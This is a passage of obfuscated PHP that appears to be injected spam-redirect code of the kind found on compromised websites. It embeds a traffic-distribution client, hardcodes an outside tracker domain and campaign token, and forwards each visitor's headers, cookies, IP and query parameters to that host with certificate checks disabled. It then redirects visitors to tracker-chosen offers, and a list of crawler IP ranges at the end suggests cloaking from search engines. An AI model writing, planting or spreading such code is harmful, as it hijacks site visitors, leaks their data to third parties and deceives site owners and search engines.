"\103\157\156\x74\x65\x6e\164\x2d\164\171\160\145\72\40" . $result->contentType; $headers[] = $header; if (!headers_sent()) { header($header); } } } public static function containsActionHeader($headers) { if (empty($headers)) { return false; } foreach ($headers as $header) { if (strpos($header, "\x4c\x6f\143\141\164\x69\157\x6e\72") === 0) { return true; } if (strstr($header, "\64\x30\x34\40\x4e\157\x74\40\x46\x6f\165\x6e\144")) { return true; } } return false; } private static function _sendResponseCode($code = null) { if ($code !== null) { switch ($code) { case 100: $text = "\x43\x6f\x6e\164\151\x6e\x75\145"; break; case 101: $text = "\123\x77\151\164\x63\x68\x69\156\x67\x20\x50\162\157\x74\157\143\x6f\154\x73"; break; case 200: $text = "\117\x4b"; break; case 201: $text = "\x43\162\x65\141\164\x65\144"; break; case 202: $text = "\x41\143\143\x65\x70\x74\x65\144"; break; case 203: $text = "\116\157\x6e\x2d\101\x75\164\150\x6f\x72\x69\x74\141\x74\x69\x76\145\40\x49\x6e\146\x6f\162\155\x61\x74\x69\157\x6e"; break; case 204: $text = "\116\157\40\103\x6f\156\164\x65\x6e\164"; break; case 205: $text = "\122\145\x73\145\x74\40\x43\x6f\156\164\145\x6e\164"; break; case 206: $text = "\120\x61\162\164\151\x61\x6c\x20\x43\x6f\x6e\164\x65\x6e\164"; break; case 300: $text = "\x4d\x75\154\164\x69\160\154\x65\40\103\x68\x6f\151\x63\x65\x73"; break; case 301: $text = "\x4d\x6f\166\x65\x64\x20\120\x65\x72\x6d\x61\156\x65\156\x74\x6c\x79"; break; case 302: $text = "\115\x6f\166\145\144\x20\124\145\x6d\160\157\x72\141\x72\151\154\x79"; break; case 303: $text = "\x53\145\145\x20\117\x74\150\x65\162"; break; case 304: $text = "\x4e\157\x74\40\x4d\x6f\144\151\146\151\145\x64"; break; case 305: $text = "\x55\x73\x65\40\120\162\x6f\x78\171"; break; case 400: $text = "\102\141\144\x20\x52\x65\161\x75\x65\x73\x74"; break; case 401: $text = "\125\x6e\x61\x75\x74\x68\x6f\162\151\172\145\144"; break; case 402: $text = "\x54\150\145\x20\154\151\143\145\156\163\x65\40\155\x75\163\164\40\142\x65\40\x69\x6e\40\x50\x72\157\x20\145\x64\x69\164\151\157\156\x20\157\162\x20\150\x69\147\150\x65\x72"; break; case 403: $text = "\x46\157\x72\x62\151\144\144\145\156"; break; case 404: $text = "\x4e\x6f\x74\40\x46\x6f\165\156\x64"; break; case 405: $text = "\x4d\145\x74\x68\157\x64\40\116\157\164\x20\x41\154\x6c\157\x77\145\x64"; break; case 406: $text = "\x4e\157\164\40\x41\x63\x63\145\x70\x74\x61\142\154\x65"; break; case 407: $text = "\x50\162\157\x78\171\x20\x41\165\164\150\145\156\x74\x69\x63\141\x74\x69\157\x6e\x20\x52\145\x71\x75\x69\162\145\144"; break; case 408: $text = "\122\145\161\165\x65\x73\x74\40\x54\x69\155\x65\x2d\157\165\x74"; break; case 409: $text = "\x43\x6f\x6e\x66\x6c\x69\x63\x74"; break; case 410: $text = "\107\x6f\x6e\145"; break; case 411: $text = "\114\145\156\x67\x74\150\40\122\145\161\x75\151\162\145\144"; break; case 412: $text = "\x50\x72\145\x63\x6f\x6e\144\151\x74\x69\157\156\40\x46\141\151\x6c\145\x64"; break; case 413: $text = "\122\145\161\x75\x65\x73\x74\40\105\x6e\x74\x69\164\x79\40\124\157\x6f\x20\114\x61\162\147\x65"; break; case 414: $text = "\x52\145\161\x75\x65\163\x74\55\125\122\x49\40\x54\x6f\157\40\114\141\162\147\145"; break; case 415: $text = "\x55\156\163\x75\160\160\157\x72\x74\x65\144\40\x4d\145\144\x69\x61\40\x54\x79\x70\x65"; break; case 500: $text = "\111\156\164\x65\x72\156\x61\154\40\123\x65\162\166\x65\162\40\x45\162\x72\157\x72"; break; case 501: $text = "\116\157\x74\40\111\x6d\160\154\x65\155\145\156\x74\x65\x64"; break; case 502: $text = "\x42\x61\x64\40\107\x61\x74\x65\167\141\171"; break; case 503: $text = "\x53\145\x72\166\x69\143\145\x20\125\156\x61\166\x61\x69\154\x61\142\154\x65"; break; case 504: $text = "\107\x61\x74\x65\x77\x61\171\x20\124\x69\155\145\x2d\157\x75\164"; break; case 505: $text = "\110\x54\x54\120\x20\x56\145\x72\x73\x69\157\156\x20\x6e\157\x74\x20\x73\165\160\x70\x6f\162\164\x65\x64"; break; default: $text = ''; } $protocol = isset($_SERVER["\x53\105\122\126\x45\x52\137\x50\122\x4f\x54\117\x43\117\114"]) ? $_SERVER["\123\105\x52\126\105\122\x5f\x50\122\x4f\124\117\103\117\114"] : "\x48\x54\x54\x50\x2f\x31\56\60"; header($protocol . "\40" . $code . "\40" . $text); } } } goto cPifu; v8NMo: class KClientError extends Exception { const ERROR_UNKNOWN = "\125\x4e\x4b\x4e\117\127\x4e"; public function getHumanCode() { switch ($this->getCode()) { case CURLE_HTTP_RETURNED_ERROR: preg_match("\x2f\x54\150\145\40\x72\x65\x71\x75\145\163\164\145\144\x20\x55\122\114\x20\x72\145\x74\165\x72\x6e\x65\144\40\145\162\x72\157\162\72\40\x28\77\47\145\x72\162\157\162\103\x6f\144\x65\x27\x5c\x64\53\x29\x2e\x2a\44\x2f", $this->getMessage(), $matches); $errorCode = isset($matches["\145\162\x72\157\162\x43\x6f\x64\145"]) ? $matches["\x65\x72\162\x6f\x72\x43\x6f\x64\x65"] : "\110\x54\124\x50\137\x45\x52\x52\117\122\137" . self::ERROR_UNKNOWN; return "\x5b\x52\105\x51\x5f\x45\x52\122\x3a\x20{$errorCode}\x5d"; case CURLE_UNSUPPORTED_PROTOCOL: return "\x5b\122\105\x51\137\x45\122\x52\72\40\x55\116\123\x55\120\120\117\122\x54\x45\x44\137\x50\x52\117\124\x4f\103\117\x4c\135"; case CURLE_FAILED_INIT: return "\133\122\x45\121\137\105\x52\x52\72\40\106\101\x49\x4c\x45\104\x5f\x49\x4e\111\x54\135"; case CURLE_URL_MALFORMAT: return "\133\x52\x45\x51\137\105\122\x52\72\x20\102\101\x44\x5f\125\122\114\135"; case CURLE_COULDNT_RESOLVE_PROXY: return "\133\x52\105\121\x5f\105\122\122\72\40\x43\x4f\125\x4c\104\116\x54\137\x52\105\x53\x4f\x4c\126\105\137\x50\122\x4f\130\131\135"; case CURLE_COULDNT_RESOLVE_HOST: return "\x5b\x52\x45\121\x5f\105\x52\122\x3a\40\x43\x4f\125\114\104\x4e\x54\x5f\x52\x45\x53\x4f\114\x56\x45\137\110\117\x53\x54\135"; case CURLE_COULDNT_CONNECT: return "\x5b\x52\105\x51\x5f\x45\x52\x52\x3a\x20\x43\117\x55\114\104\116\x54\137\x43\117\116\x4e\x45\x43\x54\135"; case CURLE_PARTIAL_FILE: return "\x5b\122\x45\121\x5f\105\x52\122\72\x20\120\x41\x52\124\x49\x41\114\x5f\106\111\114\105\x5d"; case CURLE_READ_ERROR: return "\133\x52\105\121\137\105\x52\122\x3a\x20\122\x45\101\x44\x5f\105\122\122\117\x52\135"; case CURLE_OUT_OF_MEMORY: return "\x5b\x52\x45\x51\x5f\x45\122\x52\72\40\117\x55\124\x5f\117\106\137\115\x45\115\x4f\122\x59\x5d"; case CURLE_OPERATION_TIMEDOUT: return "\x5b\122\x45\121\137\105\x52\x52\72\x20\117\x50\x45\x52\x41\x54\x49\117\116\x5f\124\111\x4d\105\x44\117\x55\x54\135"; case CURLE_HTTP_POST_ERROR: return "\133\x52\105\121\137\x45\x52\122\72\40\110\124\124\120\137\120\117\x53\124\x5f\105\122\122\x4f\x52\x5d"; case CURLE_BAD_FUNCTION_ARGUMENT: return "\x5b\x52\105\121\137\105\x52\x52\72\40\102\x41\x44\137\x46\125\x4e\x43\124\x49\x4f\x4e\x5f\101\x52\107\125\x4d\x45\x4e\x54\135"; case CURLE_TOO_MANY_REDIRECTS: return "\133\x52\x45\x51\137\105\x52\x52\x3a\40\x54\x4f\117\137\x4d\101\x4e\131\137\122\x45\x44\111\x52\105\103\124\123\135"; case CURLE_GOT_NOTHING: return "\133\x52\x45\x51\137\105\122\x52\x3a\x20\x47\117\x54\x5f\116\117\124\x48\111\116\x47\135"; case CURLE_SEND_ERROR: return "\x5b\122\105\x51\137\x45\122\x52\72\40\123\105\116\104\137\x45\122\122\x4f\122\135"; case CURLE_RECV_ERROR: return "\133\122\x45\x51\x5f\105\x52\122\x3a\x20\122\x45\103\x56\x5f\x45\122\122\x4f\122\x5d"; case CURLE_BAD_CONTENT_ENCODING: return "\x5b\122\105\x51\x5f\x45\x52\122\72\40\102\101\104\x5f\103\x4f\116\x54\105\x4e\x54\x5f\x45\116\103\x4f\x44\111\x4e\x47\x5d"; case CURLE_SSL_CACERT: case CURLE_SSL_CACERT_BADFILE: case CURLE_SSL_CERTPROBLEM: case CURLE_SSL_CIPHER: case CURLE_SSL_CONNECT_ERROR: case CURLE_SSL_ENGINE_NOTFOUND: case CURLE_SSL_ENGINE_SETFAILED: case CURLE_SSL_PEER_CERTIFICATE: case CURLE_SSL_PINNEDPUBKEYNOTMATCH: return "\x5b\122\105\x51\137\x45\122\x52\72\40\x53\123\x4c\135"; case CURLE_OK: return ''; default: return "\133\122\x45\121\137\105\122\122\72\x20" . self::ERROR_UNKNOWN . "\135"; } } } goto NPAcW; cPifu: class KHttpClient { const UA = "\x4b\x48\x74\164\x70\103\x6c\151\145\x6e\x74"; public function request($url, $params, $opts = array()) { if (!in_array("\x63\x75\x72\x6c", get_loaded_extensions())) { return json_encode(array("\145\162\x72\x6f\162" => "\x43\x75\162\x6c\x20\x65\170\164\x65\x6e\x73\x69\157\156\40\155\165\163\164\x20\x62\x65\40\x69\x6e\x73\164\163\141\x6c\x6c\x65\144")); } $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_COOKIE, isset($opts["\x63\157\x6f\153\x69\x65\163"]) ? $opts["\x63\157\x6f\153\x69\x65\x73"] : null); curl_setopt($ch, CURLOPT_NOBODY, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, self::UA); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); curl_setopt($ch, CURLOPT_FAILONERROR, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $result = curl_exec($ch); if (curl_error($ch)) { throw new KClientError(curl_error($ch), curl_errno($ch)); } if (empty($result)) { throw new KClientError("\105\155\160\164\171\x20\x72\145\x73\160\157\x6e\163\x65"); } return $result; } } goto v8NMo; aBzKY: class KClient { const SESSION_SUB_ID = "\163\165\x62\137\151\x64"; const SESSION_LANDING_TOKEN = "\154\x61\x6e\144\x69\x6e\x67\137\164\157\153\x65\156"; const VERSION = 3; const STATE_SESSION_KEY = "\153\145\151\164\x61\x72\157\x5f\x73\164\141\x74\x65"; const STATE_SESSION_EXPIRES_KEY = "\x6b\x65\x69\164\x61\162\157\137\x73\x74\141\164\x65\137\x65\170\160\x69\162\x65\163"; const DEFAULT_TTL = 1; const NOT_FOUND_STATUS = 404; private $_httpClient; private $_debug = false; private $_trackerUrl; private $_params = array(); private $_log = array(); private $_excludeParams = array("\x61\160\151\x5f\153\145\x79", "\164\157\153\x65\x6e", "\154\141\156\x67\x75\x61\147\145", "\x75\x61", "\x69\x70", "\x72\145\146\145\162\x72\145\x72", "\146\157\x72\x63\x65\x5f\162\x65\144\x69\162\145\x63\x74\x5f\x6f\x66\146\145\x72"); private $_result; private $_stateRestored; private $_sessionsDisabled = false; const ERROR = "\133\x4b\124\x72\141\x66\146\151\143\103\154\x69\145\156\x74\x5d\x20\x53\x6f\x6d\x65\164\x68\x69\x6e\147\x20\151\163\40\x77\162\x6f\x6e\147\x2e\40\105\156\141\x62\154\145\x20\x64\145\142\165\x67\x20\155\157\144\145\40\164\x6f\40\163\x65\145\x20\164\x68\x65\40\x72\145\x61\163\157\156\x2e"; public function __construct($trackerUrl, $token) { $this->trackerUrl($trackerUrl); $this->campaignToken($token); $this->version(self::VERSION); $this->param("\151\156\x66\x6f", 1); $this->fillParams(); } public function fillParams() { $referrer = isset($_SERVER["\x48\x54\x54\120\137\x52\105\x46\x45\122\105\x52"]) ? $_SERVER["\110\124\x54\x50\x5f\x52\x45\x46\105\x52\x45\x52"] : null; $this->setHttpClient(new KHttpClient()); $host = isset($_SERVER["\x48\x54\124\120\x5f\x48\x4f\123\124"]) ? $_SERVER["\110\x54\124\120\137\110\x4f\x53\x54"] : null; $requestUri = isset($_SERVER["\122\x45\x51\x55\x45\x53\124\137\125\122\111"]) ? $_SERVER["\x52\105\121\x55\105\123\124\x5f\125\122\x49"] : null; $this->ip($this->_findIp())->ua(isset($_SERVER["\x48\124\x54\x50\x5f\125\x53\105\x52\137\x41\107\x45\x4e\x54"]) ? $_SERVER["\x48\124\x54\x50\137\x55\123\x45\122\137\101\107\105\116\x54"] : null)->language(isset($_SERVER["\110\x54\124\x50\x5f\x41\x43\x43\105\x50\124\x5f\x4c\101\116\107\125\101\107\105"]) ? substr($_SERVER["\110\124\124\120\x5f\x41\x43\103\105\120\x54\x5f\114\101\x4e\107\125\x41\107\105"], 0, 2) : '')->xRequestedWith(isset($_SERVER["\x48\x54\124\x50\x5f\130\x5f\122\105\x51\x55\105\123\124\x45\104\137\127\x49\124\x48"]) ? $_SERVER["\110\x54\124\x50\x5f\130\x5f\122\x45\121\125\105\123\x54\105\104\x5f\x57\x49\124\x48"] : null)->seReferrer($referrer)->referrer($referrer)->param("\x6f\x72\x69\x67\151\x6e\141\154\x5f\150\145\x61\144\x65\162\x73", $this->_getAllHeaders())->param("\157\x72\x69\x67\x69\156\x61\x6c\137\x68\x6f\163\x74", isset($_SERVER["\110\x54\x54\x50\x5f\110\x4f\123\x54"]) ? $_SERVER["\x48\124\124\120\x5f\110\x4f\123\x54"] : "\154\157\x63\141\x6c\150\x6f\163\x74")->param("\x6f\x72\x69\147\x69\156\141\x6c\137\x6d\145\164\150\x6f\x64", isset($_SERVER["\x52\x45\x51\x55\105\x53\124\x5f\115\x45\x54\110\x4f\x44"]) ? $_SERVER["\122\x45\x51\x55\x45\x53\x54\x5f\115\x45\x54\110\117\x44"] : "\107\x45\x54")->param("\165\162\151", (!empty($_SERVER["\110\124\124\x50\x53"]) ? "\150\x74\164\x70\163" : "\x68\164\164\160") . "\72\57\57" . $host . $requestUri)->param("\x6b\166\x65\162\x73\x69\157\x6e", "\x33\x2e\x34"); if ($this->isPrefetchDetected()) { $this->param("\160\162\145\x66\145\x74\x63\150", 1); } } public function currentPageAsReferrer() { $this->referrer($this->_getCurrentPage()); return $this; } public function debug($state = true) { $this->_debug = $state; return $this; } public function seReferrer($seReferrer) { $this->_params["\x73\x65\x5f\x72\x65\x66\145\162\162\x65\x72"] = $seReferrer; return $this; } public function referrer($referrer) { $this->_params["\x72\x65\146\x65\162\162\145\x72"] = $referrer; return $this; } public function xRequestedWith($xRequestedWith) { $this->_params["\170\x5f\x72\145\x71\x75\145\163\x74\x65\x64\x5f\x77\151\x74\150"] = $xRequestedWith; return $this; } public function setHttpClient($httpClient) { $this->_httpClient = $httpClient; return $this; } public function trackerUrl($trackerUrl) { if (!empty($trackerUrl)) { $request = parse_url($trackerUrl); $this->_trackerUrl = "{$request["\163\143\x68\145\155\x65"]}\x3a\57\57{$request["\150\x6f\x73\x74"]}"; if (isset($request["\x70\157\162\x74"])) { $this->_trackerUrl .= "\x3a" . $request["\x70\x6f\x72\164"]; } } } public function token($token) { return $this->campaignToken($token); } public function campaignToken($campaignToken) { $this->_params["\164\x6f\153\x65\x6e"] = $campaignToken; return $this; } public function version($version) { $this->_params["\166\x65\x72\x73\151\157\x6e"] = $version; return $this; } public function ua($ua) { $this->_params["\x75\x61"] = $ua; return $this; } public function language($language) { $this->_params["\x6c\x61\x6e\x67\165\141\147\x65"] = $language; return $this; } public function keyword($keyword) { $this->_params["\153\145\171\x77\157\x72\x64"] = $keyword; return $this; } public function forceRedirectOffer() { $this->_params["\146\x6f\x72\x63\x65\x5f\162\x65\144\x69\162\x65\x63\x74\137\x6f\146\146\145\162"] = 1; } public function ip($ip) { $this->_params["\x69\x70"] = $ip; return $this; } public function sendUtmLabels() { foreach ($_GET as $name => $value) { if (strstr($name, "\x75\x74\x6d\x5f")) { $this->_params[$name] = $value; } } } public function setLandingToken($token) { $this->_startSession(); $_SESSION["\164\157\153\145\x6e"] = $token; } public function getSubId() { $result = $this->performRequest(); if (empty($result->info->sub_id)) { $this->log("\116\157\40\x73\165\x62\137\x69\144\40\x69\x73\40\x64\145\x66\151\156\x65\144"); return "\x6e\157\137\163\165\142\x69\x64"; } $subId = $result->info->sub_id; return $subId; } public function getToken() { $result = $this->performRequest(); if (empty($result->info->sub_id)) { $this->log("\116\x6f\40\x6c\141\156\144\x69\156\x67\x20\x74\x6f\x6b\x65\156\40\x69\x73\x20\144\x65\146\x69\x6e\x65\x64"); return "\x6e\x6f\137\x74\x6f\x6b\x65\x6e"; } $subId = $result->info->token; return $subId; } public function sendAllParams() { foreach ($_GET as $name => $value) { if (empty($this->_params[$name]) && !in_array($name, $this->_excludeParams)) { $this->_params[$name] = $value; } } } public function restoreFromSession() { if ($this->isStateRestored() || $this->_sessionsDisabled) { return; } $this->_startSession(); if (!empty($_SESSION[self::STATE_SESSION_KEY])) { if ($_SESSION[self::STATE_SESSION_EXPIRES_KEY] < time()) { unset($_SESSION[self::STATE_SESSION_KEY]); unset($_SESSION[self::STATE_SESSION_EXPIRES_KEY]); $this->log("\x53\164\141\x74\145\x20\x65\170\160\x69\x72\145\144"); } else { $this->_result = json_decode($_SESSION[self::STATE_SESSION_KEY], false); if (isset($this->_result) && isset($this->_result->headers)) { $this->_result->headers = array(); } $this->_stateRestored = true; $this->log("\x53\164\141\x74\145\40\162\x65\x73\x74\157\162\145\x64"); } } } public function disableSessions() { $this->_sessionsDisabled = true; } public function restoreFromQuery() { if (isset($_GET["\x5f\x73\165\142\x69\144"])) { $this->_stateRestored = true; if (empty($this->_result)) { $this->_result = new StdClass(); $this->_result->info = new StdClass(); } $this->_result->info->sub_id = $_GET["\x5f\163\x75\142\x69\x64"]; $this->log("\123\x75\142\x49\144\40\154\x6f\x61\x64\145\144\x20\146\x72\x6f\x6d\40\x71\x75\x65\x72\171"); if (isset($_GET["\137\164\x6f\153\145\x6e"])) { $this->_result->info->token = $_GET["\137\164\157\153\x65\x6e"]; $this->log("\114\141\156\144\x69\x6e\x67\40\164\157\153\x65\x6e\x20\154\157\141\144\x65\x64\40\146\x72\x6f\x6d\40\161\165\145\x72\171"); } $this->_storeState($this->_result, self::DEFAULT_TTL); $this->_stateRestored = true; } } public function isStateRestored() { return $this->_stateRestored; } public function isPrefetchDetected() { $checkServerParams = array("\110\124\x54\120\x5f\130\137\x50\125\x52\120\117\x53\105" => "\x70\x72\145\166\151\145\x77", "\x48\124\124\x50\x5f\130\137\x4d\117\x5a" => "\160\162\145\x66\145\164\143\150", "\110\124\x54\x50\137\130\137\x46\x42\137\x48\x54\124\x50\137\105\116\107\x49\116\105" => "\x4c\x69\147\145\162"); foreach ($checkServerParams as $name => $value) { if (isset($_SERVER[$name]) && $_SERVER[$name] == $value) { return true; } } return false; } public function saveCookie($key, $value, $ttl) { if (isset($_COOKIE[$key]) && $_COOKIE[$key] == $value) { return; } if (!headers_sent()) { setcookie($key, $value, $this->_getCookiesExpireTimestamp($ttl), "\x2f", $this->_getCookieHost()); } $_COOKIE[$key] = $value; } public function param($name, $value) { if (!in_array($name, $this->_excludeParams)) { $this->_params[$name] = $value; } return $this; } public function params($value) { if (!empty($value)) { if (is_string($value)) { parse_str($value, $result); foreach ($result as $name => $value) { $this->param($name, $value); } } } return $this; } public function reset() { $this->_result = null; } public function performRequest() { if ($this->_result) { return $this->_result; } $request = $this->_buildRequestUrl(); $params = $this->getParams(); $options = $this->_getRequestOptions(); $this->log("\x52\x65\x71\x75\145\x73\164\72\x20" . $request); try { $result = $this->_httpClient->request($request, $params, $options); $this->log("\122\145\163\160\157\x6e\x73\x65\x3a\40" . $result); } catch (KClientError $e) { if ($this->_debug) { throw $e; } else { $errorCode = $e->getHumanCode(); $errorCode = $errorCode ? $errorCode . "\40" : ''; echo $errorCode . self::ERROR; return; } } $this->_result = json_decode($result); $this->_storeState($this->_result, isset($this->_result->cookies_ttl) ? $this->_result->cookies_ttl : null); if (isset($this->_result->cookies)) { $this->_saveKeitaroCookies($this->_result->cookies, $this->_result->cookies_ttl); } return $this->_result; } public function execute($break = false, $print = true) { $result = $this->performRequest(); $body = $this->_buildBody($result); if (!$print) { return $body; } $this->_sendHeaders($result); echo $body; } public function executeAndBreak() { $result = $this->performRequest(); $body = $this->_buildBody($result); $this->_sendHeaders($result); if (!empty($body)) { die($body); } if (!empty($result->headers) && ResponseExecutor::containsActionHeader($result->headers)) { die($body); } if (!empty($result->status) && $result->status == self::NOT_FOUND_STATUS) { die($body); } } public function getContent() { $result = $this->performRequest(); return $this->_buildBody($result); } public function showLog($separator = "\x3c\x62\162\40\57\76") { echo "\x3c\150\x72\76" . implode($separator, $this->getLog()) . "\74\x68\x72\76"; } public function log($msg) { if ($this->_debug) { error_log($msg); } $this->_log[] = $msg; } public function getLog() { return $this->_log; } public function getParams() { return $this->_params; } private function _sendHeaders($result) { $file = ''; $line = ''; if (headers_sent($file, $line)) { $msg = "\x42\x6f\x64\171\40\x6f\x75\164\x70\165\164\40\x61\x6c\x72\x65\x61\x64\x79\x20\x73\x74\x61\162\164\145\144"; if (!empty($file)) { $msg .= "\x28{$file}\72{$line}\x29"; } $this->log($msg); return; } ResponseExecutor::sendHeaders($result); } private function _storeState($result, $ttl) { if ($this->_sessionsDisabled) { return; } $this->_startSession(); $_SESSION[self::STATE_SESSION_KEY] = json_encode($result); $_SESSION[self::STATE_SESSION_EXPIRES_KEY] = time() + $ttl * 60 * 60; if (!empty($result->info)) { if (!empty($result->info->sub_id)) { $_SESSION[self::SESSION_SUB_ID] = $result->info->sub_id; } if (!empty($result->info->token)) { $_SESSION[self::SESSION_LANDING_TOKEN] = $result->info->token; } } } private function _buildBody($result) { $content = ''; if (!empty($result)) { if (!empty($result->error)) { $content .= $result->error; } if (!empty($result->body)) { if (isset($result->contentType) && (strstr($result->contentType, "\151\155\141\147\145") || strstr($result->contentType, "\x61\160\160\x6c\151\x63\141\164\151\x6f\156\57\160\144\x66"))) { $content = base64_decode($result->body); } else { $content .= $result->body; } } } return $content; } private function _saveKeitaroCookies($cookies, $ttl) { foreach ($cookies as $key => $value) { $this->saveCookie($key, $value, $ttl); } } public function getOffer($params = array(), $fallback = "\x6e\x6f\137\x6f\x66\x66\145\162") { $result = $this->performRequest(); $token = $this->getToken(); if (empty($token)) { $this->log("\x43\141\x6d\160\x61\151\147\x6e\x20\150\141\163\x6e\x27\x74\40\162\x65\x74\165\x72\x6e\145\144\40\x6f\x66\146\x65\162"); return $fallback; } $params["\x5f\154\x70"] = 1; $params["\x5f\x74\x6f\153\145\156"] = $result->info->token; return $this->_buildOfferUrl($params); } public function isBot() { $result = $this->performRequest(); if (isset($result->info)) { return isset($result->info->is_bot) ? $result->info->is_bot : false; } } public function isUnique($level = "\143\141\155\160\x61\x69\147\156") { $result = $this->performRequest(); if (isset($result->info) && $result->info->uniqueness) { return isset($result->info->uniqueness->{$level}) ? $result->info->uniqueness->{$level} : false; } } public function forceChooseOffer() { throw new \Error("\146\x6f\x72\x63\145\103\x68\157\157\163\145\x4f\146\146\x65\x72\40\167\141\x73\40\x72\x65\155\x6f\x76\145\144\40\151\x6e\40\x4b\103\x6c\151\145\156\x74\x20\166\x33\56"); } public function getBody() { $result = $this->performRequest(); return $result->body; } public function getHeaders() { $result = $this->performRequest(); return $result->headers; } private function _startSession() { if (!headers_sent()) { @session_start(); } } private function _buildOfferUrl($params = array()) { $params = http_build_query($params); return "{$this->_trackerUrl}\x2f\77{$params}"; } private function _getCurrentPage() { if (isset($_SERVER["\123\x45\122\126\105\122\137\x50\117\122\124"]) && $_SERVER["\123\x45\122\126\105\x52\x5f\120\x4f\x52\x54"] == 443 || !empty($_SERVER["\110\124\124\120\x53"])) { $scheme = "\x68\x74\x74\x70\163"; } else { $scheme = "\x68\x74\x74\x70"; } return $scheme . "\72\x2f\57" . $_SERVER["\x48\x54\124\120\137\110\117\x53\124"] . $_SERVER["\x52\x45\x51\125\x45\x53\x54\137\x55\x52\x49"]; } private function _buildRequestUrl() { return $this->_trackerUrl . "\x2f\143\x6c\x69\x63\153\137\x61\160\151\x2f\166" . self::VERSION; } private function _findIp() { $ip = null; $headers = array("\110\124\x54\120\137\x58\x5f\106\x4f\122\x57\101\122\x44\105\104\x5f\106\x4f\x52", "\x48\x54\x54\120\x5f\x46\117\x52\x57\x41\122\x44\x45\104\137\x46\117\x52", "\110\x54\x54\120\137\x58\137\x46\x4f\122\127\x41\122\x44\105\x44", "\110\124\x54\120\x5f\106\x4f\x52\x57\x41\x52\x44\x45\x44", "\x48\x54\x54\120\x5f\103\x4c\111\x45\116\124\x5f\111\x50", "\110\x54\124\x50\137\x46\117\x52\x57\101\x52\104\105\104\137\x46\x4f\x52\137\111\x50", "\130\137\x46\117\x52\127\x41\122\104\x45\x44\137\x46\117\122", "\x46\117\x52\x57\x41\122\x44\x45\x44\137\106\117\x52", "\x58\x5f\106\x4f\x52\x57\x41\x52\104\x45\x44", "\106\117\x52\127\101\x52\x44\105\104", "\x43\x4c\x49\x45\x4e\x54\137\x49\x50", "\x46\117\x52\x57\x41\x52\104\105\x44\x5f\x46\x4f\x52\x5f\x49\120", "\110\x54\x54\120\x5f\103\x46\x5f\103\117\116\x4e\105\x43\124\111\x4e\x47\x5f\111\120", "\110\124\124\120\x5f\120\122\117\x58\131\x5f\x43\117\x4e\116\x45\x43\x54\111\x4f\x4e"); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $tmp = explode("\x2c", $_SERVER[$header]); $ip = trim($tmp[0]); break; } } if (strstr($ip, "\54")) { $tmp = explode("\x2c", $ip); if (stristr($_SERVER["\x48\124\x54\x50\x5f\x55\123\x45\122\137\101\x47\105\116\124"], "\155\151\x6e\151")) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (empty($ip)) { $ip = isset($_SERVER["\x52\x45\x4d\x4f\124\105\x5f\x41\104\x44\122"]) ? $_SERVER["\122\105\x4d\117\x54\x45\137\x41\x44\104\x52"] : "\61\x32\67\x2e\60\x2e\x30\x2e\x31"; } return $ip; } private function _getCookiesExpireTimestamp($ttl) { return time() + 60 * 60 * $ttl; } private function _getCookieHost() { if (isset($_SERVER["\x48\x54\124\120\137\110\117\x53\x54"]) && substr_count($_SERVER["\110\x54\124\120\x5f\110\117\123\124"], "\x2e") < 3) { $host = "\x2e" . str_replace("\x77\167\167\x2e", '', $_SERVER["\x48\x54\124\x50\137\x48\117\123\124"]); } else { $host = null; } return $host; } private function _getRequestOptions() { $opts = array(); if (isset($_SERVER["\110\124\124\120\137\x43\117\x4f\x4b\x49\x45"])) { $opts["\143\157\157\153\151\x65\163"] = preg_replace("\57\x50\110\x50\x53\105\123\123\x49\104\75\56\x2a\77\73\x2f\163\151", '', $_SERVER["\x48\124\124\120\137\103\117\x4f\113\x49\x45"]); } return $opts; } private function _getAllHeaders() { $headers = array(); foreach ($_SERVER as $name => $value) { if (substr($name, 0, 5) == "\110\124\124\x50\137") { $headers[str_replace("\40", "\55", ucwords(strtolower(str_replace("\x5f", "\x20", substr($name, 5)))))] = $value; } } return $headers; } } goto uWc4r; NPAcW: class_alias("\113\103\154\151\145\x6e\164", "\x4b\x43\154\151\143\153\x43\x6c\151\x65\156\164"); $client = new KClient("\x68\164\164\x70\x73\72\57\x2f\x6d\141\153\145\164\157\x70\150\157\x74\x6c\157\166\x65\x2e\x63\x6f\x6d\x2f", "\x37\x35\x6b\147\x70\161\x74\162\x6e\x6b\x7a\x36\154\x6d\x6b\170\x73\160\163\x67\x64\x66\163\160\x76\x33\171\146\64\x78\161\154"); $client->sendAllParams(); $client->forceRedirectOffer(); $client->param("\x73\165\x62\x5f\x69\144\x5f\62", "\142\145\x68\145\141\154\x74\x68\171\x2e\x65\163"); $client->param("\x73\165\x62\x5f\151\144\x5f\61", $_12); $client->currentPageAsReferrer(); $client->executeAndBreak(); } } goto AGQ75; uUZxy: $_4 = array("\65\56\62\65\x33\56\x36\63\x2e\x30\x2d\x35\56\x32\x35\63\x2e\66\63\56\x32\65\65", "\66\64\56\x36\70\56\70\x30\x2e\60\55\66\x34\56\66\x38\x2e\x39\65\56\x32\65\x35", "\66\x36\x2e\x32\64\71\56\x36\64\56\60\x2d\66\x36\x2e\x32\x34\x39\56\71\65\56\x32\65\x35", "\x36\x34\x2e\x31\70\56\x30\56\61\x2d\66\x34\x2e\x31\x38\x2e\x31\65\56\x32\x35\64", "\x36\64\56\62\x33\63\56\61\x36\60\56\61\x2d\x36\64\x2e\62\63\x33\56\x31\71\61\56\x32\65\x34", "\x36\66\56\x31\60\x32\x2e\60\56\x31\x2d\x36\x36\56\61\60\x32\x2e\x31\x35\x2e\x32\x35\x34", "\x37\62\x2e\x31\64\x2e\x31\71\62\x2e\x31\55\x37\62\x2e\x31\64\x2e\x32\65\65\x2e\x32\x35\64", "\x37\x34\56\61\x32\x35\56\60\x2e\61\55\67\64\56\61\x32\x35\56\62\65\x35\56\62\x35\x34", "\61\x37\63\x2e\61\71\64\56\60\56\x31\55\61\x37\63\56\x31\71\64\56\62\x35\x35\56\x32\x35\x34", 